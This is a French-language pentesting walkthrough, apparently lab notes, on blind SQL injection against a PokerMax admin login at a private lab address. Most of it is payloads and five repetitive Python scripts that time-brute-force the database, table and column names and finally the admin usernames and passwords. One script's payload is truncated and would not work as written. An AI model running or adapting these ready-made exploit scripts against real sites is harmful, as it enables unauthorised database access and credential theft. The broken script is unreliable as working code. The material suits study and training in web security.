SQLI (pokermax) - Pentesting Web

Vulnerabilité SQL Injection

Détection de la vulnérabilité d'injection SQL:

Identification d'une vulnérabilité d'injection SQL sur le site internet. Utilisation de BurpSuite pour intercepter le trafic.

Découverte du Nombre de Colonnes avec ORDER BY

admin' order by 7-- -

Tentative de Listing des Tables avec UNION SELECT

admin' union select 1,2,3,4,5,6,7-- -

Utilisation d'une Injection SQL basée sur le Temps

admin' and sleep(5)-- -
admin' and if(substr(database(),1,1)='a',sleep(5),1)-- -

Automatisation avec Python pour Extraire le Nom de la Base de Données

admin' and if(substr(database(),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 12):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr(database(),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom de toutes les Base de Données

admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()
            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom des tables:

admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='pokerleague'),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3
import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")

    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='pokerleague'),%d,1)='%s'," % (position, character),
                'password': 'admin'
            }
            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom des colonnes:

admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='pokerleague' and table_name='pokermax_admin'),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='pokerleague' and table_name='pokermax_admin'),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le contenue des colonnes username et password:

admin' and if(substr((select group_concat(username,0x3a,password) from pokermax_admin),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(username,0x3a,password) from pokermax_admin),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()
            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?